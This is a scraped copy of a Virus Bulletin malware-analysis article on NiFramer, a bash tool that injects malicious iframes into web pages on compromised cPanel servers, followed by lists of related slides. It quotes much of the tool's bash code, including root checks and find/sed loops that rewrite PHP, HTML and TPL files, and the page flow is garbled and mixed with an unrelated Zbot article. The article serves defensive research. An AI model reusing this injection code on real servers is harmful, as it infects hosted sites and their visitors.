SlideShare a Scribd company logo

NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine

Aditya K Sood
Aditya K Sood

In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.

Technology
1 of 4
Download to read offline
VIRUS BULLETIN www.virusbtn.com MALWARE ANALYSIS 3 information about each device using the QueryDosDeviceW API. Zbot uses the resulting device type and compares it against the ProcessImageFileName to determine the exact path of the executable file of the currently parsed process. Once Zbot knows the exact path of the equivalent executable file of the parsed process, it starts gathering information by calling the GetFileVersionInfoSizeW API to determine if the file contains version information. If there is no version information available for the executable file, Zbot will skip this part of the routine. This is followed by actually getting the file version information using a call to the GetFileVersionInfoW API. Then, the malware uses the VerQueryValueW API with ‘VarFileInfoTranslation’ as the parameter, to get the pointer to the translation array from the version-information resource. It uses the resulting array of language and code page identifiers to determine the ‘{lang-codepage}’ value for the next call to the VerQueryValueW API. Finally, Zbot gets the ‘Product Name’ of the executable file using another call to the VerQueryValueW API with an lpSubBlock parameter of ‘StringFileInfo{lang-codepage} ProductName’. After getting the ‘Product Name’ of the executable file, Zbot checks it against specific strings found in some anti-malware applications (see Figure 3). If the executable file’s ‘Product Name’ contains substrings of an anti-malware name, Zbot will not perform the code injection for the executable’s process. INSIDE AN IFRAME INJECTOR: A LOOK INTO NIFRAMER Aditya K. Sood Michigan State University, USA Rohit Bansal & Peter Greko Independent security researchers, USA In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer. INTRODUCTION Iframe injectors are used by attackers to automate the process of injecting malicious iframe tags into web pages. These tools are designed to perform distributed infections on a target server in a short period of time. Iframe injectors are accompanied by automated malware infection frameworks either as a built-in component or separately. In this paper, we present a variant of NiFramer, an automated iframe injection tool that is used to infect cPanel installations on compromised servers. Iframe injectors work with both dedicated and virtual hosting servers, but their primary benefit is in infecting virtual hosting servers that host large numbers of servers running websites and applications. Running an iframe injector on a compromised virtual hosting server can easily result in the infection of hundreds of web servers in just a few seconds. WRAP UP We all know that Zbot is a well-coded piece of malware. It uses a non-standard way of doing things compared with other malware. Instead of using the GetWindowsDirectory API to get the %windir% folder, it uses the newer SHGetFolderPathW API. Instead of checking the process names for anti-malware strings, it looks for the product name of the actual file in the disk. And generating 624 random DWORD values a few times just to generate a single DWORD is probably a little excessive. Zbot is one of the main players in the malware underground. Its structure is as well coded as it is designed. It has lots of functionalities and capabilities, and this article only touches on a small percentage of them. As we have seen so far, there is always room for enhancements and upgrades pertaining to its code. We are likely to see further adaptation of Zbot to its ecosystem and its environment in the near future. As always, we will be there to keep you up to date. 12 OCTOBER 2013 INFECTION MODEL AND COMPONENTS A simple infection model is explained below: • The attacker targets end-user machines to install malware. • Once the malware is installed, it exfiltrates data from the end-user systems. • The attacker retrieves the credentials (username, password) of the hosting server and uses the stolen credentials to gain access to it. (There are a number of other ways to gain access to hosting servers, which include but are not limited to: exploiting vulnerabilities, brute-forcing attacks, privilege escalations, etc.). • The compromised server may have thousands of websites hosted on it. From the attacker’s perspective, it is not feasible to edit and infect one website at a time by injecting a malicious iframe into the web pages. To automate this process, the attacker uses an iframe
VIRUS BULLETIN www.virusbtn.com injector tool which infects a large number of websites in one go. A basic outline of the NiFramer iframe injector is shown in Figure 1. Key validation Before the execution of NiFramer code, the iframe injector looks for a file named ‘niframer.txt’, which carries a secret key in the form of an MD5. The purpose of this key in the context of NiFramer is not clear. It could be an additional verification check if NiFramer is embedded within another software component – the key is required to execute NiFramer. It basically reads the file ‘niframer.key’ and outputs the value in variable ‘key’. This is matched against a hard-coded MD5/SHA key for verification and validation. If the key validation fails, two or three more attempts are made before NiFramer exits and stops the execution on the compromised server. A temporary file (/tmp/keyseq) is created for recording the number of attempts made. The embedded key does not appear to have any purpose if NiFramer is used as a standalone tool. Listing 1 shows a code snippet revealing how the key is validated. If the key is validated, the code triggers the file_check function. Injection file validation Figure 1: NiFramer injector in action. The iframe injector reads the injection code (iframe code pointing to a domain serving malware) from a file. Instead The various components of NiFramer are as follows: • The main() function is called to execute the subroutines. key_check() { if [ -f niframer.key ] then • The key_check() function is called to validate the NiFramer key. The key is required for validation when NiFramer is embedded within a framework. key=`cat niframer.key` • The file_check() function is called to verify the presence of a file containing the iframe injection. echo “ERROR: Key Invalid.” • The priv_check() function is executed to check for root access on the compromised server. • The server_software_selection() function is used to provide options for the server-side hosting software, i.e. to specify whether the server is running cPanel or a custom installation. • The iframe_injection() function is executed to trigger iframe injection in a specific folder for previously chosen files such as HTML and PHP. • The clean_environment() function removes temporary files and any hidden files generated during the injection process. We will discuss each of these components in the next section. if [ “$key” != “<Insert Key>” ]; then if [ -f /tmp/keyseq ]; then if [ “$((`cat /tmp/keyseq` + 1))” -gt 2 ]; then echo “0 retries left. Now removing self.” else echo “$((`cat /tmp/keyseq` + 1))” > /tmp/keyseq && echo “Retries Left:” “$((3 - `cat /tmp/keyseq`))” fi else echo “Retries Left: 2” echo 1 > /tmp/keyseq fi else echo “Key Found... initializing...” file_check fi else echo “ERROR: Key file not found.” DISSECTING NIFRAMER COMPONENTS This section details NiFramer’s components and the requisite code used to implement them. exit fi} Listing 1: Key validation check. OCTOBER 2013 13
VIRUS BULLETIN www.virusbtn.com of the iframe injection being hard coded, the injector is designed to read from a file in order to interpret injections for modularity and extensibility. Placing the iframe injection in a file makes it easy for the attackers to update the injections. NiFramer performs a file check as shown in Listing 2. file_check() { if [ -f infect.txt ] then priv_check else echo “infect.txt is missing, please make the file with your code included” fi} priv_check() { if [ `whoami` != “root” ] then echo “Must be ran as root.” exit else echo “###################” echo “# NiFramer by ……...#” echo “###################” softwareami fi } ---------- Truncated ------------------------- Listing 3: Privilege access rights check. Listing 2: Iframe injection file validation. softwareami() { Privilege check The iframe injector performs a privilege (i.e. access rights) check after validating the existence of the injection file. The idea is to determine whether or not the attacker has root access on the compromised server. This check is necessary because non-super-user access can skew the iframe injection process. This is because restricted accounts might not have the necessary access rights to write and update the web pages of different hosts present on the server. NiFramer requires root access in order to carry out the injection process successfully. As shown in Listing 3, the iframe injector uses the ‘whoami’ command to check for root access on the server. If the attacker has root access, the next module is executed to initiate the iframe injection process. If the attacker does not have root access, the injection tool exits and becomes dormant. Installed software selection Once root access has been verified, the type of software installed on the compromised server must be specified. The version of NiFramer we analysed has two options: cPanel web server software or custom web server software. The attacker selects the appropriate option and NiFramer executes the relevant code for the selected software. Listing 4 shows the code used to check for the installed software. Iframe injection Once the attacker has specified the hosting server software, NiFramer loads the respective component for performing iframe injections. NiFramer has the capability to inject into HTML, PHP and TPL files1. This functionality can PS3=’Choose the system web server type: ‘ Select software in “CPanel” “Custom” # Will add more definitions later. do $software done} ---------- Truncated ------------------------- Listing 4: Installed software type. be extended to include additional files which can also be injected into based on the requirement. The infection flow in custom web software is as follows: • NiFramer uses the ‘find’ command to detect the presence of PHP, HTML and TPL files and exempts a list of files by declaring a global array containing exempted entries. NiFramer provides an exemption code to list the type of files that should not be injected. Listing 5 shows how exemptions are declared. NiFramer will not inject into config.php, configuration.php and settings.php. exempt=(“! -name config.php” “! -name configuration. php” “! -name settings.php” “! -name inc”); Listing 5: File type exemption. • If the relevant files are detected, NiFramer searches for the pattern using the ‘sed’ command and injects the iframe code into the space between the <html> and </html> tags. Listing 6 shows how the custom hosting software is searched and web pages are injected. 1 ‘The TPL file extension is used [in] PHP web development and PHP web applications as a template file. [It is] mostly used by [the] Smarty template engine. [The] template is a common text source code file and contains user-predefined variables that are replaced by user-defined 14 OCTOBER 2013 output content when [a] PHP web application [is] parsing a template file or files and generating a web page or other output format.’ (http://tpl.fileextensionguide.com/)
VIRUS BULLETIN www.virusbtn.com custom() { echo -n “Please enter directory of home folders: “ read home_dir cd $home_dir echo “Starting injection of PHP files” CPanel() { echo “Scanning $(ls /home/ | wc -l) directorys for files. This could take a while...” cd /home/ sleep 5 echo “Starting injection of PHP files” sleep 5 for i in $(find `pwd` -name ‘*.php’ ${exempt[@]}) for i in $(find `pwd` -name ‘*.php’ ${exempt[@]}) do do echo Injecting “$i” echo Injecting “$i” cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done # Similarly for HTML and TPL files -------------------- Truncated ----------------------- cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done # Similarly for HTML and TPL files echo “Completed injection of found files.” Listing 6: Injecting iframe into custom web server software. The infection flow in cPanel software is as follows: • NiFramer traverses the ‘home’ directory to determine the number of hosts present on the server and to get an idea of the number of iframe injections to be performed. It then jumps into the home directory to initiate the process. • It checks for the presence of HTML, PHP and TPL files, as in the case of custom hosting server software, and starts the injection process. The injection is performed in a similar fashion to that used for custom software – the iframe is injected between the <html> and </html> tags. • In cPanel iframe injection, NiFramer performs an additional check for the presence of index files. If no index file is found on the server in the respective host directory, NiFramer creates one and injects an iframe into it. This is to provide additional assurance that the iframe has been injected. cd /root/cpanel3-skel/public_html/ if [ $(ls | grep html); then for i in $(find `pwd` -name ‘*.html’ ${exempt[@]}) do echo Injecting “$i” cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done else echo “No HTML files found in /root/cpanel3-skel/ public_html/” echo “Creating index.html..” echo $code > index.html sleep 1 fi echo “Completed injection of skeleton directory.” echo “Starting injection into CPanel & WHM template files (The panel itself)” Listing 7 shows how NiFramer infects cPanel software. Listing 7: Injecting iframe into cPanel server software. CLEAN ENVIRONMENT Once the iframes have been injected into the web pages, NiFramer cleans up the temporary files created during the injection process. The idea is to remove all traces of the injection process to try to make it as stealthy as possible. The ‘rm’ command is used to delete the temporary (.tmp) files. • We will be looking at other iframe injector code in our future research. The aim is to start with the most basic and delve deeper into more complex code. We plan to look at the ZFramer and Citadel injectors next. CONCLUSION ADDITIONAL NOTES • The code of NiFramer is not complex (in the way it is constructed). It is written in bash scripting language, but it serves its purpose and the code has been used in the wild. This article presents the design of a very basic iframe injector tool known as NiFramer. Using an automated iframe injector tool, an attacker can easily automate the injection process and perform distributed infections, thereby infecting hundreds of web servers in just seconds. OCTOBER 2013 15

Recommended

ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool nullowaspmumbai
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
 

Recommended

ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool nullowaspmumbai
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
 
Android Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android ApplicationsAndroid Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android Applicationsh4oxer
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission ModelGeorgia Weidman
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 
Persistence in windows
Persistence in windowsPersistence in windows
Persistence in windowsArpan Raval
 
Windows Live Forensics 101
Windows Live Forensics 101Windows Live Forensics 101
Windows Live Forensics 101Arpan Raval
 
Network penetration testing
Network penetration testingNetwork penetration testing
Network penetration testingImaginea
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)Sam Bowne
 
CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)Sam Bowne
 
CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)Sam Bowne
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Stephan Chenette
 
Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Siddhartha Kakarla
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing Jewel Joy
 
CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)Sam Bowne
 
Permission in Android Security: Threats and solution
Permission in Android Security: Threats and solutionPermission in Android Security: Threats and solution
Permission in Android Security: Threats and solutionTandhy Simanjuntak
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...CODE BLUE
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC MobileSteve De Zitter
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemyPROIDEA
 
Organizational Behavior: Introduction
Organizational Behavior: IntroductionOrganizational Behavior: Introduction
Organizational Behavior: Introduction51 lecture
 
The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6Alan Mendelevich
 

More Related Content

What's hot

Android Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android ApplicationsAndroid Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android Applicationsh4oxer
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission ModelGeorgia Weidman
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 
Persistence in windows
Persistence in windowsPersistence in windows
Persistence in windowsArpan Raval
 
Windows Live Forensics 101
Windows Live Forensics 101Windows Live Forensics 101
Windows Live Forensics 101Arpan Raval
 
Network penetration testing
Network penetration testingNetwork penetration testing
Network penetration testingImaginea
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)Sam Bowne
 
CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)Sam Bowne
 
CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)Sam Bowne
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Stephan Chenette
 
Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Siddhartha Kakarla
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing Jewel Joy
 
CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)Sam Bowne
 
Permission in Android Security: Threats and solution
Permission in Android Security: Threats and solutionPermission in Android Security: Threats and solution
Permission in Android Security: Threats and solutionTandhy Simanjuntak
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...CODE BLUE
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC MobileSteve De Zitter
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemyPROIDEA
 

What's hot (20)

Android Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android ApplicationsAndroid Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android Applications
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
 
Persistence in windows
Persistence in windowsPersistence in windows
Persistence in windows
 
Windows Live Forensics 101
Windows Live Forensics 101Windows Live Forensics 101
Windows Live Forensics 101
 
Network penetration testing
Network penetration testingNetwork penetration testing
Network penetration testing
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
 
CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)
 
CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)CNIT 128 7. Attacking Android Applications (Part 2)
CNIT 128 7. Attacking Android Applications (Part 2)
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013
 
Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Permission enforcement s in android new (1)
Permission enforcement s in android new (1)
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing Windows Phone Application Penetration Testing
Windows Phone Application Penetration Testing
 
CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)CNIT 128 7. Attacking Android Applications (Part 3)
CNIT 128 7. Attacking Android Applications (Part 3)
 
Permission in Android Security: Threats and solution
Permission in Android Security: Threats and solutionPermission in Android Security: Threats and solution
Permission in Android Security: Threats and solution
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC Mobile
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
 

Viewers also liked

Organizational Behavior: Introduction
Organizational Behavior: IntroductionOrganizational Behavior: Introduction
Organizational Behavior: Introduction51 lecture
 
The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6Alan Mendelevich
 
Developer's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and MonetizationDeveloper's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and MonetizationAlan Mendelevich
 
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...auexpo Conference
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”New Rainmaker
 
How Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterHow Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterBuffer
 
Transgenicos(2)
Transgenicos(2)Transgenicos(2)
Transgenicos(2)08curso18
 
Why Content Marketing Fails
Why Content Marketing FailsWhy Content Marketing Fails
Why Content Marketing FailsRand Fishkin
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great InfographicsSlideShare
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShareKapost
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareEmpowered Presentations
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation OptimizationOneupweb
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingContent Marketing Institute
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...SlideShare
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShareSlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShareSlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksSlideShare
 

Viewers also liked (20)

Organizational Behavior: Introduction
Organizational Behavior: IntroductionOrganizational Behavior: Introduction
Organizational Behavior: Introduction
 
The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6
 
Developer's Guide to Windows Phone App Marketing and Monetization
